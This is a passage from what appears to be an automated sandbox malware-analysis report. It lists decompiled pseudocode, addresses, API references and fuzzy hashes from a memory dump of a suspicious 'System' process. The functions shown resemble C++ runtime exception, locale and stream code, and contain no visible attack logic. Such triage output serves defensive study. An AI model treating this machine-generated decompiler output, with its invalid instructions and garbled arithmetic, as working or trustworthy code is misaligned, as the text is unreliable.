				if (( *_t112 & 0x1fffffff) - 0x19930521 < 0) goto 0xe4c66c4e;
				_t87 = _t112[8];
				if (_t87 == 0) goto 0xe4c66c4e;
				_t61 = E00007FF67FF6E4C63DE8( *_t112 & 0x1fffffff);
				if (_t87 != 0) goto 0xe4c66c6e;
				if (( *_t112 & 0x1fffffff) - 0x19930522 < 0) goto 0xe4c66d1d;
				if ((_t61 & 0x00000001) == 0) goto 0xe4c66d1d;
				if ( *_t134 != 0xe06d7363) goto 0xe4c66ce4;
				if ( *((long long*)(_t134 + 0x18)) - 3 < 0) goto 0xe4c66ce4;
				if ( *((long long*)(_t134 + 0x20)) - 0x19930522 <= 0) goto 0xe4c66ce4;
				_t105 =  *((intOrPtr*)(_t134 + 0x30));
				if ( *((long long*)(_t105 + 8)) == 0) goto 0xe4c66ce4;
				E00007FF67FF6E4C63DFC(_t105);
				if (_t105 +  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x30)) + 8)) == 0) goto 0xe4c66ce4;
				_v32 = _a64 & 0x000000ff;
				_v40 = _a56;
				_v48 = _a48;
				_v56 = _t112;
				 *0xe4c894c0(_t156);
				goto 0xe4c66d22;
				_v32 = _a56;
				_v40 = _a48;
				_v48 = _a64;
				_v56 = _t112;
				_t65 = E00007FF67FF6E4C659BC(_t66, _t67, _t134, _t140, _t157, _t137, _t105 +  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x30)) + 8)));
				asm("pushad");
				return _t65;
			}


























                                                                                                                                                              0x7ff6e4c66b0c
                                                                                                                                                              0x7ff6e4c66b0c
                                                                                                                                                              0x7ff6e4c66b0f
                                                                                                                                                              0x7ff6e4c66b13
                                                                                                                                                              0x7ff6e4c66b17
                                                                                                                                                              0x7ff6e4c66b1b
                                                                                                                                                              0x7ff6e4c66b25
                                                                                                                                                              0x7ff6e4c66b28
                                                                                                                                                              0x7ff6e4c66b2e
                                                                                                                                                              0x7ff6e4c66b31
                                                                                                                                                              0x7ff6e4c66b34
                                                                                                                                                              0x7ff6e4c66b39
                                                                                                                                                              0x7ff6e4c66b3e
                                                                                                                                                              0x7ff6e4c66b4f
                                                                                                                                                              0x7ff6e4c66b5c
                                                                                                                                                              0x7ff6e4c66b60
                                                                                                                                                              0x7ff6e4c66b66
                                                                                                                                                              0x7ff6e4c66b70
                                                                                                                                                              0x7ff6e4c66b74
                                                                                                                                                              0x7ff6e4c66b78
                                                                                                                                                              0x7ff6e4c66b82
                                                                                                                                                              0x7ff6e4c66b88
                                                                                                                                                              0x7ff6e4c66b92
                                                                                                                                                              0x7ff6e4c66b9c
                                                                                                                                                              0x7ff6e4c66baa
                                                                                                                                                              0x7ff6e4c66bb4
                                                                                                                                                              0x7ff6e4c66bb8
                                                                                                                                                              0x7ff6e4c66bc4
                                                                                                                                                              0x7ff6e4c66bcc
                                                                                                                                                              0x7ff6e4c66bd5
                                                                                                                                                              0x7ff6e4c66bdb
                                                                                                                                                              0x7ff6e4c66bde
                                                                                                                                                              0x7ff6e4c66be7
                                                                                                                                                              0x7ff6e4c66bec
                                                                                                                                                              0x7ff6e4c66bf3
                                                                                                                                                              0x7ff6e4c66bf5
                                                                                                                                                              0x7ff6e4c66bfd
                                                                                                                                                              0x7ff6e4c66c07
                                                                                                                                                              0x7ff6e4c66c11
                                                                                                                                                              0x7ff6e4c66c1c
                                                                                                                                                              0x7ff6e4c66c21
                                                                                                                                                              0x7ff6e4c66c2a
                                                                                                                                                              0x7ff6e4c66c38
                                                                                                                                                              0x7ff6e4c66c3a
                                                                                                                                                              0x7ff6e4c66c3e
                                                                                                                                                              0x7ff6e4c66c40
                                                                                                                                                              0x7ff6e4c66c4c
                                                                                                                                                              0x7ff6e4c66c5a
                                                                                                                                                              0x7ff6e4c66c68
                                                                                                                                                              0x7ff6e4c66c74
                                                                                                                                                              0x7ff6e4c66c7a
                                                                                                                                                              0x7ff6e4c66c83
                                                                                                                                                              0x7ff6e4c66c85
                                                                                                                                                              0x7ff6e4c66c8d
                                                                                                                                                              0x7ff6e4c66c8f
                                                                                                                                                              0x7ff6e4c66ca2
                                                                                                                                                              0x7ff6e4c66caf
                                                                                                                                                              0x7ff6e4c66cc1
                                                                                                                                                              0x7ff6e4c66cd0
                                                                                                                                                              0x7ff6e4c66cd7
                                                                                                                                                              0x7ff6e4c66cdc
                                                                                                                                                              0x7ff6e4c66ce2
                                                                                                                                                              0x7ff6e4c66cef
                                                                                                                                                              0x7ff6e4c66d01
                                                                                                                                                              0x7ff6e4c66d0f
                                                                                                                                                              0x7ff6e4c66d13
                                                                                                                                                              0x7ff6e4c66d18
                                                                                                                                                              0x7ff6e4c66d26
                                                                                                                                                              0x7ff6e4c66d3c

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                              • Opcode ID: 08d856c06adae109ea5504a5777f8aad7d0014654fe766c793eb5dc1d70e26a6
                                                                                                                                                              • Instruction ID: c34f70af1a6ae4eda95eac9d53c575d445a4f63a6fb257b3fcefd27e009c6c9c
                                                                                                                                                              • Opcode Fuzzy Hash: 08d856c06adae109ea5504a5777f8aad7d0014654fe766c793eb5dc1d70e26a6
                                                                                                                                                              • Instruction Fuzzy Hash: E851A27BA6868386EB248F21948437876B0FB84F94F148177DA4C87B95CF3DE451CB0A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C79478 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 134COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                              			E00007FF67FF6E4C79478(void* __ebx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				signed char _t11;
				void* _t17;
				void* _t34;

				_t17 = _t34;
				 *((long long*)(_t17 + 8)) = __rbx;
				 *((long long*)(_t17 + 0x10)) = __rbp;
				 *((long long*)(_t17 + 0x18)) = __rsi;
				 *((long long*)(_t17 + 0x20)) = __rdi;
				r15b = r9b;
				_t19 =  >  ? r8d : 0;
				_t20 = ( >  ? r8d : 0) + 9;
				if (__rdx - ( >  ? r8d : 0) + 9 > 0) goto 0xe4c794dd;
				_t11 = E00007FF67FF6E4C6C854(( >  ? r8d : 0) + 9);
				asm("adc edi, edi");
				 *0x18E818895C8B48E5 =  *((long long*)(0x18e818895c8b48e5)) - 1;
				return _t11 & 0x00000060;
			}






                                                                                                                                                              0x7ff6e4c79478
                                                                                                                                                              0x7ff6e4c7947b
                                                                                                                                                              0x7ff6e4c7947f
                                                                                                                                                              0x7ff6e4c79483
                                                                                                                                                              0x7ff6e4c79487
                                                                                                                                                              0x7ff6e4c79499
                                                                                                                                                              0x7ff6e4c794a2
                                                                                                                                                              0x7ff6e4c794a5
                                                                                                                                                              0x7ff6e4c794ad
                                                                                                                                                              0x7ff6e4c794af
                                                                                                                                                              0x7ff6e4c794bd
                                                                                                                                                              0x7ff6e4c794bf
                                                                                                                                                              0x7ff6e4c794dc

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: -$e+000$gfff
                                                                                                                                                              • API String ID: 3215553584-2620144452
                                                                                                                                                              • Opcode ID: 58cdb031105c543d41c417ef2e260b333795cfb18faa66ef8bcf0c9f98777dc0
                                                                                                                                                              • Instruction ID: 0a43ee82689e795885757e5ef6595eef7b9a5c416fe1d31861a4a027cb24a9b6
                                                                                                                                                              • Opcode Fuzzy Hash: 58cdb031105c543d41c417ef2e260b333795cfb18faa66ef8bcf0c9f98777dc0
                                                                                                                                                              • Instruction Fuzzy Hash: D7512667B5C6C386F7608F3998843696BA1E781F90F08D332C79C87AD6CE2ED0408706
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C547E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 123COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 20%
                                                                                                                                                              			E00007FF67FF6E4C547E0(void* __edi, long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, void* __r8, long long _a32) {
				signed int _v40;
				long long _v368;
				long long _v376;
				long long _v384;
				void* _v392;
				void* __rsi;
				void* _t25;
				void* _t27;
				signed long long _t38;
				signed long long _t39;
				void* _t49;
				intOrPtr _t57;
				intOrPtr* _t71;
				void* _t74;

				_a32 = __rbx;
				_t38 =  *0xe4ca90a0; // 0x1ae1b17e2973
				_t39 = _t38 ^ _t74 - 0x00000190;
				_v40 = _t39;
				_t71 = __rdx;
				if ( *((long long*)( *__rcx + 0x48)) - 0x10 < 0) goto 0xe4c5481b;
				E00007FF67FF6E4C57270( *((intOrPtr*)( *__rcx + 0x30)));
				if (_t39 != 0) goto 0xe4c54906;
				_v384 = 0;
				_v376 = 0;
				_v368 = 0;
				asm("int 0xbe");
				asm("invalid");
				_t49 = E00007FF67FF6E4C57C20( *((intOrPtr*)(__rcx + 8)));
				if (_t49 - 1 < 0) goto 0xe4c5489a;
				_t25 = E00007FF67FF6E4C55300(_t49, __rdx, _v384, __rcx, _t49);
				if ( *((long long*)( *((intOrPtr*)( *_t71 + 4)) + _t71 + 0x10)) != 0) goto 0xe4c54895;
				if (_t49 <= 0) goto 0xe4c5489a;
				goto 0xe4c54853;
				asm("invalid");
				asm("invalid");
				_t57 = _v384;
				if (_t57 == 0) goto 0xe4c548db;
				if (_v368 - _t57 - 0x1000 < 0) goto 0xe4c548d6;
				if (_t57 -  *((intOrPtr*)(_t57 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c54900;
				0xe4c623d0();
				return E00007FF67FF6E4C623B0(_t25, _t27, _v40 ^ _t74 - 0x00000190);
			}

















                                                                                                                                                              0x7ff6e4c547e0
                                                                                                                                                              0x7ff6e4c547ef
                                                                                                                                                              0x7ff6e4c547f6
                                                                                                                                                              0x7ff6e4c547f9
                                                                                                                                                              0x7ff6e4c54804
                                                                                                                                                              0x7ff6e4c54816
                                                                                                                                                              0x7ff6e4c5481f
                                                                                                                                                              0x7ff6e4c54828
                                                                                                                                                              0x7ff6e4c54830
                                                                                                                                                              0x7ff6e4c54835
                                                                                                                                                              0x7ff6e4c5483a
                                                                                                                                                              0x7ff6e4c5484f
                                                                                                                                                              0x7ff6e4c54851
                                                                                                                                                              0x7ff6e4c54869
                                                                                                                                                              0x7ff6e4c5486f
                                                                                                                                                              0x7ff6e4c5487c
                                                                                                                                                              0x7ff6e4c5488d
                                                                                                                                                              0x7ff6e4c54891
                                                                                                                                                              0x7ff6e4c54893
                                                                                                                                                              0x7ff6e4c5489e
                                                                                                                                                              0x7ff6e4c548a0
                                                                                                                                                              0x7ff6e4c548a3
                                                                                                                                                              0x7ff6e4c548ab
                                                                                                                                                              0x7ff6e4c548bf
                                                                                                                                                              0x7ff6e4c548d4
                                                                                                                                                              0x7ff6e4c548d6
                                                                                                                                                              0x7ff6e4c548ff

                                                                                                                                                              APIs
                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E4C54900
                                                                                                                                                                • Part of subcall function 00007FF6E4C51330: __std_exception_copy.LIBVCRUNTIME ref: 00007FF6E4C5135F
                                                                                                                                                                • Part of subcall function 00007FF6E4C641CC: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6E4C60F5E), ref: 00007FF6E4C64210
                                                                                                                                                                • Part of subcall function 00007FF6E4C641CC: _purecall.KERNELBASE(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6E4C60F5E), ref: 00007FF6E4C64256
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileHeader__std_exception_copy_invalid_parameter_noinfo_noreturn_purecall
                                                                                                                                                              • String ID: opening internal file '$' in zip$Error
                                                                                                                                                              • API String ID: 445863741-3498895160
                                                                                                                                                              • Opcode ID: 531448eabe3619c9abdebc131a5cc34815c87832cab05ccefa6654fd8dc1f903
                                                                                                                                                              • Instruction ID: 1f26fc31df6067b4595d71fb5d57a0f6b804e5333de7ae1c6b02a55cf75ab019
                                                                                                                                                              • Opcode Fuzzy Hash: 531448eabe3619c9abdebc131a5cc34815c87832cab05ccefa6654fd8dc1f903
                                                                                                                                                              • Instruction Fuzzy Hash: EC41B627A5998341EA10AB36E4D03BE6371EF88FD0F404133EA5DC7696DE2DD441C74A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C4D010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                              			E00007FF67FF6E4C4D010(void* __rax, long long __rbx, long long* __rcx, void* __rdx, long long __rsi) {
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t57;
				void* _t70;
				intOrPtr _t85;
				void* _t95;
				void* _t99;
				long long* _t100;
				void* _t103;
				void* _t104;
				void* _t106;
				long long _t110;

				_t70 = __rax;
				 *((long long*)(_t106 + 0x10)) = __rbx;
				 *((long long*)(_t106 + 0x18)) = __rsi;
				_t104 = _t106 - 0x47;
				_t100 = __rcx;
				if (__rcx == 0) goto 0xe4c4d15a;
				if ( *__rcx != 0) goto 0xe4c4d15a;
				 *((intOrPtr*)(__rax - 0x75)) =  *((intOrPtr*)(__rax - 0x75)) + _t56;
				asm("lock dec eax");
				_t85 =  *((intOrPtr*)(__rdx + 8));
				if (_t85 == 0) goto 0xe4c4d06c;
				if ( *((intOrPtr*)(_t85 + 0x28)) != 0) goto 0xe4c4d073;
				goto 0xe4c4d073;
				E00007FF67FF6E4C60D0C(_t57, _t104 - 0x29);
				r14d = r14d ^ r14d;
				 *((long long*)(_t104 - 0x21)) = _t110;
				 *((intOrPtr*)(_t104 - 0x19)) = r14b;
				 *((long long*)(_t104 - 0x11)) = _t110;
				 *((intOrPtr*)(_t104 - 9)) = r14b;
				 *((long long*)(_t104 - 1)) = _t110;
				 *((intOrPtr*)(_t104 + 7)) = r14w;
				 *((long long*)(_t104 + 0xf)) = _t110;
				 *((intOrPtr*)(_t104 + 0x17)) = r14w;
				 *((long long*)(_t104 + 0x1f)) = _t110;
				 *((intOrPtr*)(_t104 + 0x27)) = r14b;
				 *((long long*)(_t104 + 0x2f)) = _t110;
				 *((intOrPtr*)(_t104 + 0x37)) = r14b;
				if (0xe4c9f71b == 0) goto 0xe4c4d177;
				E00007FF67FF6E4C612B8(_t70, 0xe4c9f71b, _t104 - 0x29, 0xe4c9f71b);
				 *(__rsi + 8) = r14d;
				 *((long long*)(__rsi)) = 0xe4c89a28;
				 *_t100 = __rsi;
				E00007FF67FF6E4C61324(_t104 - 0x29);
				if ( *((intOrPtr*)(_t104 + 0x2f)) == 0) goto 0xe4c4d0f2;
				E00007FF67FF6E4C69C88(_t56, _t57, 0xe4c9f71b, 0xe4c9f71b, _t110);
				 *((long long*)(_t104 + 0x2f)) = _t110;
				if ( *((intOrPtr*)(_t104 + 0x1f)) == 0) goto 0xe4c4d104;
				E00007FF67FF6E4C69C88(_t56, _t57, 0xe4c9f71b, 0xe4c9f71b, _t99);
				 *((long long*)(_t104 + 0x1f)) = _t110;
				if ( *((intOrPtr*)(_t104 + 0xf)) == 0) goto 0xe4c4d116;
				E00007FF67FF6E4C69C88(_t56, _t57, 0xe4c9f71b, 0xe4c9f71b, _t103);
				 *((long long*)(_t104 + 0xf)) = _t110;
				if ( *((intOrPtr*)(_t104 - 1)) == 0) goto 0xe4c4d128;
				E00007FF67FF6E4C69C88(_t56, _t57, 0xe4c9f71b, 0xe4c9f71b);
				 *((long long*)(_t104 - 1)) = _t110;
				if ( *((intOrPtr*)(_t104 - 0x11)) == 0) goto 0xe4c4d13a;
				E00007FF67FF6E4C69C88(_t56, _t57, 0xe4c9f71b, 0xe4c9f71b);
				 *((long long*)(_t104 - 0x11)) = _t110;
				if ( *((intOrPtr*)(_t104 - 0x21)) == 0) goto 0xe4c4d14c;
				_t54 = E00007FF67FF6E4C69C88(_t56, _t57, 0xe4c9f71b, 0xe4c9f71b);
				 *((long long*)(_t104 - 0x21)) = _t110;
				_t95 = _t104 - 0x29;
				_t55 = E00007FF67FF6E4C60D84(_t54, _t95);
				 *0x2 =  *0x2 + _t55;
				 *((intOrPtr*)(_t95 - 0x75)) =  *((intOrPtr*)(_t95 - 0x75)) + _t56;
				_t44 = _t95 - 0x75;
				 *_t44 =  *((intOrPtr*)(_t95 - 0x75)) - _t56;
				if ( *_t44 >= 0) goto 0xe4c4d19f;
				return _t55;
			}
















                                                                                                                                                              0x7ff6e4c4d010
                                                                                                                                                              0x7ff6e4c4d010
                                                                                                                                                              0x7ff6e4c4d015
                                                                                                                                                              0x7ff6e4c4d01e
                                                                                                                                                              0x7ff6e4c4d02d
                                                                                                                                                              0x7ff6e4c4d033
                                                                                                                                                              0x7ff6e4c4d03d
                                                                                                                                                              0x7ff6e4c4d04c
                                                                                                                                                              0x7ff6e4c4d04f
                                                                                                                                                              0x7ff6e4c4d054
                                                                                                                                                              0x7ff6e4c4d05b
                                                                                                                                                              0x7ff6e4c4d064
                                                                                                                                                              0x7ff6e4c4d06a
                                                                                                                                                              0x7ff6e4c4d079
                                                                                                                                                              0x7ff6e4c4d07f
                                                                                                                                                              0x7ff6e4c4d082
                                                                                                                                                              0x7ff6e4c4d086
                                                                                                                                                              0x7ff6e4c4d08a
                                                                                                                                                              0x7ff6e4c4d08e
                                                                                                                                                              0x7ff6e4c4d092
                                                                                                                                                              0x7ff6e4c4d096
                                                                                                                                                              0x7ff6e4c4d09b
                                                                                                                                                              0x7ff6e4c4d09f
                                                                                                                                                              0x7ff6e4c4d0a4
                                                                                                                                                              0x7ff6e4c4d0a8
                                                                                                                                                              0x7ff6e4c4d0ac
                                                                                                                                                              0x7ff6e4c4d0b0
                                                                                                                                                              0x7ff6e4c4d0b7
                                                                                                                                                              0x7ff6e4c4d0c4
                                                                                                                                                              0x7ff6e4c4d0ca
                                                                                                                                                              0x7ff6e4c4d0d5
                                                                                                                                                              0x7ff6e4c4d0d8
                                                                                                                                                              0x7ff6e4c4d0df
                                                                                                                                                              0x7ff6e4c4d0eb
                                                                                                                                                              0x7ff6e4c4d0ed
                                                                                                                                                              0x7ff6e4c4d0f2
                                                                                                                                                              0x7ff6e4c4d0fd
                                                                                                                                                              0x7ff6e4c4d0ff
                                                                                                                                                              0x7ff6e4c4d104
                                                                                                                                                              0x7ff6e4c4d10f
                                                                                                                                                              0x7ff6e4c4d111
                                                                                                                                                              0x7ff6e4c4d116
                                                                                                                                                              0x7ff6e4c4d121
                                                                                                                                                              0x7ff6e4c4d123
                                                                                                                                                              0x7ff6e4c4d128
                                                                                                                                                              0x7ff6e4c4d133
                                                                                                                                                              0x7ff6e4c4d135
                                                                                                                                                              0x7ff6e4c4d13a
                                                                                                                                                              0x7ff6e4c4d145
                                                                                                                                                              0x7ff6e4c4d147
                                                                                                                                                              0x7ff6e4c4d14c
                                                                                                                                                              0x7ff6e4c4d150
                                                                                                                                                              0x7ff6e4c4d154
                                                                                                                                                              0x7ff6e4c4d164
                                                                                                                                                              0x7ff6e4c4d166
                                                                                                                                                              0x7ff6e4c4d16a
                                                                                                                                                              0x7ff6e4c4d16a
                                                                                                                                                              0x7ff6e4c4d16d
                                                                                                                                                              0x7ff6e4c4d176

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                              • API String ID: 2775327233-1405518554
                                                                                                                                                              • Opcode ID: 9440e57b6f8069bf482770f74c1049c0023748c70997cbbba8da9c9bbc6df8bb
                                                                                                                                                              • Instruction ID: f26c73b8fb912c4083e5b637ce8c63f9ae8cb4bcb6ee58734307346da4d607dd
                                                                                                                                                              • Opcode Fuzzy Hash: 9440e57b6f8069bf482770f74c1049c0023748c70997cbbba8da9c9bbc6df8bb
                                                                                                                                                              • Instruction Fuzzy Hash: B5414C2BB9A64299EB10EF70D4903FC26B4EF44B48F044436DE4DA7A55CE39D522D34A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C42B00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF67FF6E4C42B00(void* __eax, void* __edx, void* __eflags, void* __rcx) {
				signed long long _t8;

				 *(__rcx + 0x10) = _t8 & 0x00000017;
				if (__eflags == 0) goto 0xe4c42b16;
				if (r8b == 0) goto 0xe4c42b25;
				goto 0xe4c42b1b;
				return __eax;
			}




                                                                                                                                                              0x7ff6e4c42b07
                                                                                                                                                              0x7ff6e4c42b0d
                                                                                                                                                              0x7ff6e4c42b12
                                                                                                                                                              0x7ff6e4c42b14
                                                                                                                                                              0x7ff6e4c42b1a

                                                                                                                                                              APIs
                                                                                                                                                              • __std_exception_copy.LIBVCRUNTIME ref: 00007FF6E4C42BB8
                                                                                                                                                                • Part of subcall function 00007FF6E4C641CC: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6E4C60F5E), ref: 00007FF6E4C64210
                                                                                                                                                                • Part of subcall function 00007FF6E4C641CC: _purecall.KERNELBASE(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6E4C60F5E), ref: 00007FF6E4C64256
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileHeader__std_exception_copy_purecall
                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                              • API String ID: 1930782590-1866435925
                                                                                                                                                              • Opcode ID: e082dd76537d9d62ea19e467e1bc7f36a70a4156b6ab080c13c5a4184de4e153
                                                                                                                                                              • Instruction ID: 1b156c0bc5ab46c13c88fd9d958199fa93c162270e5a8b08ad55071b06ddccc7
                                                                                                                                                              • Opcode Fuzzy Hash: e082dd76537d9d62ea19e467e1bc7f36a70a4156b6ab080c13c5a4184de4e153
                                                                                                                                                              • Instruction Fuzzy Hash: 6C21D32BA58B4791EA048F31D5C22B97331FB54B84F988133DA4D83665EF3EE596C306
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C58870 Relevance: 6.3, APIs: 4, Instructions: 283COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 36%
                                                                                                                                                              			E00007FF67FF6E4C58870(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __rsi, void* __r15) {
				void* __rdi;
				void* __rbp;
				void* __r14;
				unsigned short _t104;
				void* _t107;
				void* _t112;
				void* _t114;
				void* _t116;
				void* _t118;
				void* _t130;
				void* _t143;
				signed long long _t156;
				long long _t167;
				signed long long _t168;
				void* _t175;
				void* _t176;
				signed long long _t193;
				long long _t197;
				void* _t208;
				intOrPtr _t231;
				intOrPtr _t234;
				intOrPtr _t240;
				intOrPtr _t243;
				intOrPtr _t249;
				intOrPtr _t252;
				intOrPtr _t255;
				void* _t258;
				intOrPtr* _t259;
				intOrPtr* _t263;
				long long _t264;
				void* _t266;
				void* _t267;
				void* _t269;
				signed long long _t270;
				long long _t272;
				void* _t281;
				void* _t282;
				long long _t283;

				_t285 = __r15;
				 *((long long*)(_t269 + 0x18)) = __rbx;
				 *((long long*)(_t269 + 0x20)) = __rsi;
				_t267 = _t269 - 0x47;
				_t270 = _t269 - 0xd0;
				_t156 =  *0xe4ca90a0; // 0x1ae1b17e2973
				 *(_t267 + 0x37) = _t156 ^ _t270;
				_t259 = __rdx;
				_t263 = __rcx;
				r14d = 0;
				 *((long long*)(_t267 - 0x39)) = _t283;
				 *((long long*)(_t267 - 0x29)) = __rdx;
				 *((char*)(_t267 - 0x39)) = r14d;
				_t272 =  *((intOrPtr*)(__rdx + 0x10));
				if (_t272 == 0) goto 0xe4c5897b;
				_t197 =  *0xe4ca9010; // 0x1
				if (0xffffffff - _t272 - _t197 < 0) goto 0xe4c58c7f;
				if ( *((intOrPtr*)(__rdx + 0x18)) - 0x10 < 0) goto 0xe4c588f2;
				_t161 =  >=  ?  *0xe4ca9000 : 0xe4ca9000;
				 *((long long*)(_t270 + 0x30)) = _t197;
				 *((long long*)(_t270 + 0x28)) =  >=  ?  *0xe4ca9000 : 0xe4ca9000;
				 *((long long*)(_t270 + 0x20)) = _t272;
				_t13 = _t267 - 0x49; // 0x8348c78b40245c8b
				_t14 = _t267 - 0x19; // 0x7ff6e4c586ff
				E00007FF67FF6E4C4D1B0(__rbx, _t14,  *_t13 & 0x000000ff,  *((intOrPtr*)(__rdx)), _t283, _t258);
				_t15 = _t267 - 0x21; // 0x44c7482024448948
				_t231 =  *_t15;
